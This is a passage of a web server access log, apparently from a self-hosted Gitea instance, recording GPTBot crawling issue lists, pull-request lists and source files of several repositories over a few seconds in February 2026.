git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:18:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:18:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10252] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:19:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13361] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:19:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" -[17/Feb/2026:19:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21833] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" -[17/Feb/2026:19:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10087] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10093] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10262] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt?display=rendered" [Client 74.7.227.38] [Length 11263] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 